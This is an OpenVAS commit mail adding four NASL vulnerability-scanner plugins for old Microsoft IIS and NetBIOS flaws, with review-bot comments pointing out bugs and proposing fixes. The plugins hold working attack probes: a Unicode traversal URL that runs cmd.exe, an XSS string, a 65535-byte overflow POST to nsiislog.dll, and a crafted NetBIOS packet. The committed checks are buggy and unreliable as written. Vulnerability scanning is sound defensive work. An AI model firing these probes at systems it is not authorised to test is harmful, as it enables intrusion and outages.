[Openvas-commits] r2809 - in trunk/openvas-plugins: . scripts
Mon Mar 16 23:15:44 CET 2009
Author: edjenguele
Date: 2009-03-16 23:15:41 +0100 (Mon, 16 Mar 2009)
New Revision: 2809
Added:
trunk/openvas-plugins/scripts/remote-MS00-078.nasl
trunk/openvas-plugins/scripts/remote-MS03-018.nasl
trunk/openvas-plugins/scripts/remote-MS03-022.nasl
trunk/openvas-plugins/scripts/remote-MS03-034.nasl
Modified:
trunk/openvas-plugins/ChangeLog
Log:
Added new plugins:
remote-MS00-078.nasl
remote-MS03-018.nasl
remote-MS03-022.nasl
remote-MS03-034.nasl
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2009-03-16 21:52:10 UTC (rev 2808)
+++ trunk/openvas-plugins/ChangeLog 2009-03-16 22:15:41 UTC (rev 2809)
@@ -1,4 +1,12 @@
2009-03-16 Christian Eric Edjenguele <christian.edjenguele at owasp.org>
+ * script/remote-MS00-078.nasl
+ * script/remote-MS00-034.nasl
+ * script/remote-MS03-022.nasl
+ * script/remote-MS03-018.nasl:
+ Added new plugin
+
+
+2009-03-16 Christian Eric Edjenguele <christian.edjenguele at owasp.org>
* scripts/XRMS_CVE-2008-3664.nasl
* scripts/remote-MS07-040.nasl
* scripts/remote-MS06-056.nasl
@@ -236,17 +244,17 @@
scripts/butterfly_organizer_multiple_vulnerabilities.nasl:
Added new plugins from Michael Meyer
-2009-03-08 Christian Eric Edjenguele <c_edjenguele at yahoo.it>
+2009-03-08 Christian Eric Edjenguele <christian.edjenguele at owasp.org>
* scripts/remote-detect-filemaker-pwd-disclosure.nasl: New.
FileMaker Pro Client Authentication User Password Disclosure
Vulnerability.
-2009-03-08 Christian Eric Edjenguele <c_edjenguele at yahoo.it>
+2009-03-08 Christian Eric Edjenguele <christian.edjenguele at owasp.org>
* scripts/remote-MS00-060.nasl: Setting script ID.
-2009-03-08 Christian Eric Edjenguele <c_edjenguele at yahoo.it>
+2009-03-08 Christian Eric Edjenguele <christian.edjenguele at owasp.org>
* scripts/remote-MS00-060.nasl: New. MS00-060 security check.
Added: trunk/openvas-plugins/scripts/remote-MS00-078.nasl
===================================================================
--- trunk/openvas-plugins/scripts/remote-MS00-078.nasl 2009-03-16 21:52:10 UTC (rev 2808)
+++ trunk/openvas-plugins/scripts/remote-MS00-078.nasl 2009-03-16 22:15:41 UTC (rev 2809)
@@ -0,0 +1,161 @@
+# OpenVAS Vulnerability Test
+# $Id$
+# Description:
+# Microsoft Security Bulletin (MS00-078)
+# 'Web Server Folder Traversal' Vulnerability
+# Microsoft IIS Executable File Parsing Vulnerability (MS00-086)
+#
+# Affected Software:
+# Microsoft Internet Information Server 4.0
+# Microsoft Internet Information Server 5.0
+#
+# remote-MS00-078.nasl
+#
+# Author:
+# Christian Eric Edjenguele <christian.edjenguele at owasp.org>
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2 or later,
+# as published by the Free Software Foundation
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+#
+
+
+
+if(description)
+{
+script_id(101014);
+script_cve_id("CVE-2000-0884");
+script_bugtraq_id(1806);
+name["english"] = "Microsoft MS00-078 security check";
+script_name(english:name["english"]);
+
+desc["english"] = "
+
+Microsoft IIS 4.0 and 5.0 are affected by a web server trasversal vulnerability.
+This vulnerability could potentially allow a visitor to a web site to take a wide range of destructive actions against it,
+including running programs on it.
+
+Solution :
+
+There is not a new patch for this vulnerability. Instead, it is eliminated by the patch that accompanied Microsoft Security Bulletin MS00-057.
+Download locations for this patch
+
+Microsoft IIS 4.0:
+http://support.microsoft.com/kb/269862/en-us
+
+Microsoft IIS 5.0:
+http://technet.microsoft.com/windowsserver/2000/default.aspx
+
+
+
+
+
+Risk factor: high";
+
+
+script_description(english:desc["english"]);
+
+summary["english"] = "Microsoft IIS 4.0 and 5.0 are prone to web server trasversal vulnerabilities";
+
+script_summary(english:summary["english"]);
+
+script_category(ACT_ATTACK);
+
+script_copyright(english:"This script is Written by Christian Eric Edjenguele <christian.edjenguele at owasp.org> and released under GPL v2 or later");
+family["english"] = "Windows : Microsoft Bulletins";
+script_family(english:family["english"]);
+script_require_ports("Services/www");
+
+exit(0);
+}
+
+#
+# The script code starts here
+#
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+iis = get_kb_list("Services/www");
+
+
+# remote command to run
+r_cmd = '/winnt/system32/cmd.exe?/c+dir+c:';
+
+d = make_list('/scripts/',
+ '/msadc/',
+ '/iisadmpwd/',
+ '/_vti_bin/',
+ '/_mem_bin/',
+ '/exchange/',
+ '/pbserver/',
+ '/rpc/',
+ '/cgi-bin/',
+ '/');
+
+uc = make_list('%c0%af',
+ '%c0%9v',
+ '%c1%c1',
+ '%c0%qf',
+ '%c1%8s',
+ '%c1%9c',
+ '%c1%pc',
+ '%c1%1c',
+ '%c0%2f',
+ '%e0%80%af');
+
+
+h_ip = get_host_ip();
+
+foreach port (iis)
+{
+ soc = open_sock_tcp(port);
+ foreach webdir (d)
+ {
+ foreach uni_code (uc)
+ {
+ # build the malicious url
+ url = strcat(webdir , '..' , uni_code , '..' , uni_code , '..' , uni_code , '..' , uni_code , '..' , uni_code , '..' , r_cmd);
+
+ # build the query, put headers
+ qry = string('GET /' + url + ' HTTP/1.0\r\n',
+ 'Host: ' + h_ip + '\r\n',
+ 'Connection: Keep-Alive\r\n\r\n');
+
+ req = http_get(item:qry, port:port);
+ send(socket:soc, data:req);
+
+ # get back the response
+ reply = recv(socket:soc, length:4096);
+
+ if(reply)
+ return;
+
+ }
+ }
+
+ req = http_get(item:page, port:port);
+ send(socket:soc, data: req);
+
+ reply = recv(socket:soc, length:4096);
+ close(soc);
+
+ if(reply)
+ {
+ header_server = egrep(pattern:"Server", string:reply, icase:TRUE);
+ if(("Microsoft-IIS" >< header_server ) && (egrep(pattern:"HTTP/1.[01] 200", string:reply)) && (("<dir>" >< reply) ||
+ 'directory of' >< reply))
+ report = 'Exploit String' + url + ' for vulnerability:\n' + reply;
+ security_hole(port:port, data:report);
+ }
+}
+
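Review bot: The `if` on L211 has no braces, so only the `report =` assignment on L213 is conditional and `security_hole(port:port, data:report)` on L214 runs for every port that returns any reply at all — a false positive on any web server, with `report` unset. The probe loop above it never reaches that check in a useful state either: the `return` on L197 leaves the script on the first non-empty reply before it is examined, and when no probe answers, L202 requests `page`, which is never assigned. L186–L190 also build a complete request line in `qry` and then pass it as `item:` to `http_get`, which wraps it in another GET, so the server receives a request for a literal 'GET //scripts/...' path; pass `url` as the item instead. Since http_keepalive.inc is already included, `http_keepalive_send_recv(port:port, data:req)` would remove the unchecked `open_sock_tcp` on L177 and the socket that is reused across every probe without ever being closed inside the loops. The rewritten loop below moves the response check inside the innermost loop and stops at the first confirmed hit.
```nasl
foreach port (iis)
{
  foreach webdir (d)
  {
    foreach uni_code (uc)
    {
      # … unchanged: url construction …
      req = http_get(item:url, port:port);
      reply = http_keepalive_send_recv(port:port, data:req);
      if(reply && "Microsoft-IIS" >< reply &&
         egrep(pattern:"^HTTP/1\.[01] 200", string:reply) &&
         ("<dir>" >< reply || "directory of" >< tolower(reply)))
      {
        report = 'Exploit String ' + url + ' for vulnerability:\n' + reply;
        security_hole(port:port, data:report);
        exit(0);
      }
    }
  }
}
```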
Added: trunk/openvas-plugins/scripts/remote-MS03-018.nasl
===================================================================
--- trunk/openvas-plugins/scripts/remote-MS03-018.nasl 2009-03-16 21:52:10 UTC (rev 2808)
+++ trunk/openvas-plugins/scripts/remote-MS03-018.nasl 2009-03-16 22:15:41 UTC (rev 2809)
@@ -0,0 +1,214 @@
+# OpenVAS Vulnerability Test
+# $Id$
+# Description:
+# Microsoft Security Bulletin MS03-018
+# Cumulative Patch for Internet Information Service (811114)
+# Redirection Cross Site Scripting CAN-2003-0223
+# Server Side Include Web Pages Buffer Overrun CAN-2003-0224
+# ASP Headers Denial of Service CAN-2003-0225
+# Microsoft IIS 'SSINC.DLL' Include Buffer Overflow Vulnerability (MS03-018)
+# WebDAV Denial of Service CAN-2003-0226
+#
+#
+# Affected Software:
+# Microsoft Internet Information Server 4.0
+# Microsoft Internet Information Services 5.0
+# Microsoft Internet Information Services 5.1
+#
+# Non Affected Software:
+# Microsoft Internet Information Services 6.0
+#
+#
+# Tested on:
+#
+# [Windows NT EN]
+# Windows NT SP3 -> 39658520604f0e8aa50f9a81e98ea133 - Vulnerable
+# Windows NT SP6 -> 39658520604f0e8aa50f9a81e98ea133 - Vulnerable
+# Windows NT SP6a + OP -> 39ff5076bc08e9135762e251d2694641 - Not Vulnerable
+# Windows NT SRP -> 39ff5076bc08e9135762e251d2694641 - Not Vulnerable
+#
+# [Windows 2000 EN]
+# Windows 2000 SP0 -> df65cc2183d93eec835e7369e7339080 - Vulnerable
+# Windows 2000 SP1 -> df65cc2183d93eec835e7369e7339080 - Vulnerable
+# Windows 2000 SP2 -> 6ae807197693dc1d9eb364e1e590f69e - Vulnerable
+# Windows 2000 SP2 + ms03-018 Patch -> d17aefa456210ce25b6e315f50a5d8d0 - Not Vulnerable
+# Windows 2000 SP3 -> d17aefa456210ce25b6e315f50a5d8d0 - Vulnerable (Not implemented here)
+# Windows 2000 SP3 + ms03-018 Patch -> d17aefa456210ce25b6e315f50a5d8d0 - Not Vulnerable
+# Windows 2000 SP4 -> d17aefa456210ce25b6e315f50a5d8d0 - Not Vulnerable
+# Windows 2000 SRP -> d17aefa456210ce25b6e315f50a5d8d0 - Not Vulnerable
+# Windows 2000 Windows Update -> d17aefa456210ce25b6e315f50a5d8d0 - Not Vulnerable
+#
+# [Windows 2000 IT]
+# Windows 2000 SP0 -> 81f7ab909260148e04f662fc31e3c336 - Vulnerable
+# Windows 2000 SP1 -> 81f7ab909260148e04f662fc31e3c336 - Vulnerable
+# Windows 2000 SP2 -> a723b2e8e9722b53d616ead1ef86e66b - Vulnerable
+# Windows 2000 SP2 + ms03-018 -> 389fe7f7596a41a13d6eb384e7f964d8 - Not Vulnerable
+# Windows 2000 SP3 -> 389fe7f7596a41a13d6eb384e7f964d8 - Vulnerable (Not implemented here)
+# Windows 2000 SP3 + ms03-018 -> 389fe7f7596a41a13d6eb384e7f964d8 - Not Vulnerable
+# Windows 2000 SP4 -> 389fe7f7596a41a13d6eb384e7f964d8 - Not Vulnerable
+# Windows 2000 SRP -> 389fe7f7596a41a13d6eb384e7f964d8 - Not Vulnerable
+# Windows 2000 Windows Update -> 389fe7f7596a41a13d6eb384e7f964d8 - Not Vulnerable
+#
+# [Windows XP EN]
+# Windows XP SP1 -> 979b3d197cf71be7f98c9d9e9acb61c0 - Vulnerable (Not implemented here)
+# Windows XP SP1 + ms03-018 Patch -> 979b3d197cf71be7f98c9d9e9acb61c0 - Not Vulnerable (No differences in files with unpatched system)
+# Windows XP SP2 -> 979b3d197cf71be7f98c9d9e9acb61c0 - Not Vulnerable (No differences in files with unpatched system)
+#
+# [Windows XP IT]
+# Windows XP SP0 -> a7945dc825ff65fe0c954fa41d763de0 - Vulnerable
+# Windows XP SP1 -> 8e49af43858540be0754bd4f9074871e - Vulnerable (Not implemented here)
+# Windows XP SP1 + ms03-018 Patch -> 8e49af43858540be0754bd4f9074871e - Not Vulnerable (No differences in files with unpatched system)
+# Windows XP SP2 -> 8e49af43858540be0754bd4f9074871e - Not Vulnerable (No differences in files with unpatched system)
+#
+# [Windows 2003 EN]
+# Windows 2003 SP0 -> 23d6b92bc7eb100fc1294e6b124b7e75 - Not Vulnerable
+#
+#
+# End User Bulletin: An end user version of this bulletin is available at: http://www.microsoft.com/athome/security/update/bulletins/default.mspx
+#
+# remote-MS03-018.nasl
+#
+# Author:
+# Christian Eric Edjenguele <christian.edjenguele at owasp.org>
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2 or later,
+# as published by the Free Software Foundation
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+#
+
+
+
+if(description)
+{
+script_id(101017);
+script_cve_id("CAN-2003-0223", "CAN-2003-0224", "CAN-2003-0225", "CAN-2003-0226");
+name["english"] = "Microsoft MS03-018 security check";
+script_name(english:name["english"]);
+
+desc["english"] = "
+
+A Cross-Site Scripting (XSS) vulnerability affecting IIS 4.0, 5.0 and 5.1 involving the error message that's returned to advise that a
+requested URL has been redirected.
+An attacker who was able to lure a user into clicking a link on his or her web site could relay a request containing script to a
+third-party web site running IIS, thereby causing the third-party site's response (still including the script) to be sent to the user.
+The script would then render using the security settings of the third-party site rather than the attacker's.
+A buffer overrun that results because IIS 5.0 does not correctly validate requests for certain types of web pages known as server side includes.
+A denial of service vulnerability that results because of a flaw in the way IIS 4.0 and 5.0 allocate memory requests when constructing
+headers to be returned to a web client.
+A denial of service vulnerability that results because IIS 5.0 and 5.1 do not correctly handle an error condition when
+an overly long WebDAV request is passed to them. As a result an attacker could cause IIS to fail.
+
+
+
+
+Solution :
+
+Microsoft has released a patch to correct these issues
+
+There is a dependency associated with this patch - it requires the patch from Microsoft Security Bulletin MS02-050 to be installed.
+If this patch is installed and MS02-050 is not present, client side certificates will be rejected.
+This functionality can be restored by installing the MS02-050 patch.
+
+IIS 4.0:
+http://www.microsoft.com/downloads/details.aspx?FamilyId=1DBC1914-98E9-4DED-ADBF-E9B374A1F79D&displaylang=en
+
+IIS 5.0:
+http://www.microsoft.com/downloads/details.aspx?FamilyId=2F5D9852-4ADD-44F8-8715-AC3D7D7D94BF&displaylang=en
+
+IIS 5.1:
+32-bit Edition: http://www.microsoft.com/downloads/details.aspx?FamilyId=77CFE3EF-C5C5-401C-BC12-9F08154A5007&displaylang=en
+64-bit Edition: http://www.microsoft.com/downloads/details.aspx?FamilyId=86F4407E-B9BF-4490-9421-008407578D11&displaylang=en
+
+The IIS 4.0 patch can be installed on systems running Windows NT 4.0 Service Pack 6a.
+http://support.microsoft.com/kb/241211
+
+The IIS 5.0 patch can be installed on systems running Windows 2000 Service Pack 2 or Service Pack 3.
+http://www.microsoft.com/windows2000/downloads/servicepacks/sp2/default.mspx
+http://www.microsoft.com/windows2000/downloads/servicepacks/sp3/default.mspx
+
+The IIS 5.1 patch can be installed on systems running Windows XP Professional Gold and Service Pack 1.
+http://www.microsoft.com/windowsxp/downloads/updates/sp1/default.mspx
+
+
+
+
+Risk factor: High";
+
+
+script_description(english:desc["english"]);
+
+summary["english"] = "Internet Information Service Multiples Vulnerabilities MS03-018";
+
+script_summary(english:summary["english"]);
+
+script_category(ACT_ATTACK);
+
+script_copyright(english:"This script is Written by Christian Eric Edjenguele <christian.edjenguele at owasp.org> and released under GPL v2 or later");
+family["english"] = "Windows : Microsoft Bulletins";
+script_family(english:family["english"]);
+script_require_ports("Services/www");
+
+exit(0);
+}
+
+
+
+#
+# The script code starts here
+#
+
+
+include("http_func.inc");
+
+
+iis_servers = get_kb_item("Services/www");
+
+h_ip = get_host_ip();
+qrystr = '/iissamples/sdk/asp/components/redirect.asp?url=<script>alert(openvas)</script>';
+
+# Vulnerable hashes
+# 1 Windows NT SP3 and SP6 EN
+# 2 Windows 2000 SP0 SP1 EN
+# 3 Windows 2000 SP2 EN
+# 4 Windows 2000 SP0 SP1 IT
+# 5 Windows 2000 SP2 IT
+# 6 Windows XP SP0 IT
+
+md5_hashes = make_list('39658520604f0e8aa50f9a81e98ea133',
+ 'df65cc2183d93eec835e7369e7339080',
+ '6ae807197693dc1d9eb364e1e590f69e',
+ '81f7ab909260148e04f662fc31e3c336',
+ 'a723b2e8e9722b53d616ead1ef86e66b',
+ 'a7945dc825ff65fe0c954fa41d763de0');
+
+
+
+foreach port (iis_servers)
+{
+ soc = open_sock_tcp(port);
+
+ req = http_get(item:qrystr, port:port);
+ send(socket:soc, data:req);
+
+ # get back the response
+ reply = recv(socket:soc, length:4096);
+
+ if(reply)
+ {
+ page_hash = md5(reply);
+ for(i = 0; i < max_index(md5_hashes); i++)
+ {
+ if(page_hash == md5_hashes[i]) security_hole(port);
+ }
+
+ }
+}
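Review bot: `page_hash = md5(reply)` on L429 is compared with hex strings, but the NASL digest builtin I know of is `MD5()`, which returns raw bytes and needs `hexstr()` before it can equal an entry of `md5_hashes`; as written the comparison on L432 cannot match, and if a lowercase `md5` does not exist the script errors out. Even with `hexstr(MD5(...))`, `reply` is the raw response including headers, and an IIS response carries a `Date:` header that changes every second, so a digest of the whole reply will not be stable; hash only the body, e.g. `body = strstr(reply, '\r\n\r\n'); if(body) page_hash = hexstr(MD5(body));`, and confirm that the hashes recorded in the header comment were taken over the body. `recv(..., length:4096)` on L425 may also truncate the page, which changes the digest. L395 uses `get_kb_item("Services/www")` while remote-MS00-078.nasl in this same commit uses `get_kb_list`; a single value from `get_kb_item` makes `foreach port (iis_servers)` on L417 questionable, and the socket opened on L419 is never checked or closed.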
Added: trunk/openvas-plugins/scripts/remote-MS03-022.nasl
===================================================================
--- trunk/openvas-plugins/scripts/remote-MS03-022.nasl 2009-03-16 21:52:10 UTC (rev 2808)
+++ trunk/openvas-plugins/scripts/remote-MS03-022.nasl 2009-03-16 22:15:41 UTC (rev 2809)
@@ -0,0 +1,151 @@
+# OpenVAS Vulnerability Test
+# $Id$
+# Description:
+# Microsoft Security Bulletin MS03-022
+# Vulnerability in ISAPI Extension for Windows Media Services Could Cause Code Execution
+# Microsoft Windows Media Services 'nsiislog.dll' Buffer Overflow Vulnerability (MS03-019)
+# BUGTRAQ:20030626 Windows Media Services Remote Command Execution #2
+#
+# Affected Software:
+# Microsoft Windows 2000
+#
+# Not Affected Software Versions:
+# Windows NT 4.0
+# Microsoft Windows XP
+# Microsoft Windows Server 2003
+#
+# remote-MS03-022.nasl
+#
+# Author:
+# Christian Eric Edjenguele <christian.edjenguele at owasp.org>
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2 or later,
+# as published by the Free Software Foundation
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+#
+
+
+
+if(description)
+{
+script_id(101016);
+script_cve_id("CAN-2003-0349");
+name["english"] = "Microsoft MS03-022 security check";
+script_name(english:name["english"]);
+
+desc["english"] = "
+
+There is a flaw in the way nsiislog.dll processes incoming client requests.
+A vulnerability exists because an attacker could send specially formed HTTP request (communications)
+to the server that could cause IIS to fail or execute code on the user's system.
+
+
+
+
+
+Solution :
+
+Microsoft has released a patch to correct these issues
+Download locations for this patch
+
+Microsoft Windows 2000:
+http://www.microsoft.com/downloads/details.aspx?FamilyId=F772E131-BBC9-4B34-9E78-F71D9742FED8&displaylang=en
+
+Note: This patch can be installed on systems running Microsoft Windows 2000 Service Pack 2,
+Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4.
+This patch has been superseded by the one provided in Microsoft Security Bulletin MS03-019.
+http://www.microsoft.com/technet/security/bulletin/MS03-019.mspx
+
+
+
+
+
+
+Risk factor: Critical";
+
+
+script_description(english:desc["english"]);
+
+summary["english"] = "ISAPI Extension for Windows Media Services Remote Code Execution Vulnerability";
+
+script_summary(english:summary["english"]);
+
+script_category(ACT_ATTACK);
+
+script_copyright(english:"This script is Written by Christian Eric Edjenguele <christian.edjenguele at owasp.org> and released under GPL v2 or later");
+family["english"] = "Windows : Microsoft Bulletins";
+script_family(english:family["english"]);
+script_require_ports("Services/www");
+
+exit(0);
+}
+
+
+#
+# The script code starts here
+#
+
+include("http_func.inc");
+
+
+iis_servers = get_kb_item("Services/www");
+
+h_ip = get_host_ip();
+
+remote_exe = '';
+
+
+
+foreach port (iis_servers)
+{
+ soc = open_sock_tcp(port);
+
+ # request the page
+ qry = string("GET /" , "/scripts/nsiislog.dll" , ' HTTP/1.0\r\n',
+ "Host: " , h_ip , "\r\n",
+ "Connection: Keep-Alive\r\n\r\n");
+
+ req = http_get(item:qry, port:port);
+ send(socket:soc, data:req);
+
+ # get back the response
+ reply = recv(socket:soc, length:4096);
+
+ if(reply)
+ {
+ if('NetShow ISAPI Log Dll' >< reply)
+ {
+ url_args = make_list('date', 'time',
+ 'c-dns', 'cs-uri-stem', 'c-starttime', 'x-duration', 'c-rate',
+ 'c-status', 'c-playerid', 'c-playerversion', 'c-player-language',
+ 'cs(User-Agent)', 'cs(Referer)', 'c-hostexe');
+
+ foreach parameter (url_args) remote_exe += parameter + "=openvas&";
+
+ remote_exe += 'c-ip=' + crap(65535);
+
+ # build the media player client request
+ mpclient = string("POST /", "/scripts/nsiislog.dll", " HTTP/1.0\r\n",
+ "Host: ", h_ip, "\r\n",
+ "User-Agent: ", "NSPlayer/2.0", "\r\n",
+ "Content-Type: ", "application/x-www-form-urlencoded" , "\r\n",
+ "Content-Length: ", strlen(remote_exe) , "\r\n\r\n");
+
+ req2 = http_post(item:mpclient, port:port);
+ send(socket:soc, data:req2);
+ #send(socket:soc, data:remote_exe);
+
+ response = recv(socket:sock, length:4096);
+ if((egrep(pattern:"HTTP/1.[01] 500", string:response)) && ('The remote procedure call failed. ' >< response)) security_hole(port);
+ }
+ }
+}
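Review bot: `response = recv(socket:sock, length:4096)` on L588 reads from `sock`, which is never defined; the socket is `soc`, so `response` is always empty and the `security_hole` condition on L589 can never be satisfied. The same request-wrapping mistake as in remote-MS00-078.nasl appears on L554 and L578: a full request line plus headers is built by hand and then passed as `item:` to `http_get`/`http_post`, which build a request of their own around it, so the server sees a path beginning with the literal text 'GET //scripts/'. Pass `"/scripts/nsiislog.dll"` as the item and let `http_post` (or a direct `send` of the hand-built string) carry the headers, not both. `remote_exe` is initialised once on L545 outside the port loop and keeps growing with every port, the result of `open_sock_tcp` on L551 is never checked, and the socket is never closed.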
Added: trunk/openvas-plugins/scripts/remote-MS03-034.nasl
===================================================================
--- trunk/openvas-plugins/scripts/remote-MS03-034.nasl 2009-03-16 21:52:10 UTC (rev 2808)
+++ trunk/openvas-plugins/scripts/remote-MS03-034.nasl 2009-03-16 22:15:41 UTC (rev 2809)
@@ -0,0 +1,155 @@
+# OpenVAS Vulnerability Test
+# $Id$
+# Description:
+# Microsoft Security Bulletin MS03-034
+# Flaw in NetBIOS Could Lead to Information Disclosure
+#
+# Affected software
+#
+# Microsoft Windows NT Workstation 4.0
+# Microsoft Windows NT Server 4.0®
+# Microsoft Windows NT Server 4.0, Terminal Server Edition
+# Microsoft Windows 2000
+# Microsoft Windows XP
+# Microsoft Windows Server 2003
+#
+# Not Affected Software:
+#
+# Microsoft Windows Millennium Edition
+#
+#
+# remote-MS03-034.nasl
+#
+# Author:
+# Christian Eric Edjenguele <christian.edjenguele at owasp.org>
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2 or later,
+# as published by the Free Software Foundation
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+#
+
+
+
+
+ if(description)
+{
+script_id(101015);
+script_cve_id("CAN-2003-0661");
+name["english"] = "Microsoft MS03-034 security check";
+script_name(english:name["english"]);
+
+desc["english"] = "
+Under certain conditions, the response to a NetBT Name Service query may, in addition to the typical reply,
+contain random data from the target system's memory. This data could, for example, be a segment of HTML
+if the user on the target system was using an Internet browser, or it could contain other types of data
+that exist in memory at the time that the target system responds to the NetBT Name Service query.
+An attacker could seek to exploit this vulnerability by sending a NetBT Name Service query to the target system
+and then examine the response to see if it included any random data from that system's memory.
+
+
+
+
+
+
+Solution :
+Microsoft has released a patch to fix this issue, download it from the following website:
+
+Windows Server 2003
+http://www.microsoft.com/downloads/details.aspx?FamilyId=A59CC2AC-F182-4CD5-ACE7-3D4C2E3F1326&displaylang=en
+
+Windows Server 2003 64 bit Edition
+http://www.microsoft.com/downloads/details.aspx?FamilyId=140CF7BE-0371-4D17-8F4C-951B76AC3024&displaylang=en
+
+Windows XP
+http://www.microsoft.com/downloads/details.aspx?FamilyId=1C9D8E86-5B8C-401A-88B2-4443FFB9EDC3&displaylang=en
+
+Windows XP 64 bit Edition
+http://www.microsoft.com/downloads/details.aspx?FamilyId=378D4B58-BF2C-4406-9D88-E6A3C4601795&displaylang=en
+
+Windows 2000
+http://www.microsoft.com/downloads/details.aspx?FamilyId=D0564162-4EAE-42C8-B26C-E4D4D496EAD8&displaylang=en
+
+Windows NT Server 4.0
+http://www.microsoft.com/downloads/details.aspx?FamilyId=F131D63A-F74F-4CAF-95BD-D7FA37ADCF38&displaylang=en
+
+Windows NT Server 4.0, Terminal Server Edition
+http://www.microsoft.com/downloads/details.aspx?FamilyId=22379951-64A9-446B-AC8F-3F2F080383A9&displaylang=en
+
+
+
+Risk factor : Low";
+
+script_description(english:desc["english"]);
+
+summary["english"] = "Flaw in NetBIOS Could Lead to Information Disclosure";
+
+script_summary(english:summary["english"]);
+
+script_category(ACT_ATTACK);
+
+script_copyright(english:"This script is Written by Christian Eric Edjenguele <christian.edjenguele at owasp.org> and released under GPL v2 or later");
+family["english"] = "Windows : Microsoft Bulletins";
+script_family(english:family["english"]);
+script_dependencies("find_service.nes");
+script_require_ports("137");
+
+
+ exit(0);
+}
+
+
+
+#
+# The script code starts here
+#
+
+
+# default NetBIOS udp port
+port = 137;
+
+matrix = make_array();
+
+# Build the malicious packet
+request = raw_string("\x7c\x54\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00",
+ "\x20\x43\x4B\x41\x41\x41\x41\x41\x41\x41\x41\x41",
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x21",
+ "\x00\x01");
+
+for(i = 0; i < 50; i++)
+{
+ soc = open_sock_udp(port);
+ send(socket:soc, data:request);
+
+ response = recv(socket:soc, length:4096, timeout:20);
+ close(soc);
+
+ if(strlen(response) > 58 )
+ {
+ min = strlen(response) - 58;
+ element = substr(response, min, strlen(response));
+ matrix[max_index(matrix)] = element;
+ }
+
+ # the length of the aray
+ dim = max_index(matrix) - 1;
+ if(dim > 1)
+ {
+ for(j = 0; j < i; j++)
+ if(matrix[j] != matrix[i])
+ # Report Microsoft Windows 'NetBT Name Service' Information Leakage Vulnerability (MS03-034)
+ security_warning(port);
+ }
+
+}
+
+
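Review bot: The comparison loop on L744–L745 indexes `matrix` with the probe counter `i`, but `matrix` only gains an element when a response is longer than 58 bytes (L733–L737), so after any short or missing reply `matrix[i]` is unset and `matrix[j] != matrix[i]` is true for every earlier element, which reports the vulnerability on a host that never leaked anything; it also keeps calling `security_warning(port)` on every later iteration instead of stopping. The `dim > 1` guard on L742 delays the check until three samples are stored while the loop still compares against index `i`. The rewrite below keeps its own element count, compares a new sample only against stored samples, and exits after the first report. Unrelated to the logic, L640 and L703 are indented one space unlike the other three scripts, and the ChangeLog entry in this commit lists this file as `script/remote-MS00-034.nasl` rather than `scripts/remote-MS03-034.nasl`. `open_sock_udp` on L727 is never checked for failure.
```nasl
for(i = 0; i < 50; i++)
{
  # … unchanged: open_sock_udp, send, recv, close …
  if(strlen(response) > 58)
  {
    element = substr(response, strlen(response) - 58);
    n = max_index(matrix);
    for(j = 0; j < n; j++)
    {
      if(matrix[j] != element)
      {
        # trailing bytes differ between replies to the same query: MS03-034 information leak
        security_warning(port);
        exit(0);
      }
    }
    matrix[n] = element;
  }
}
```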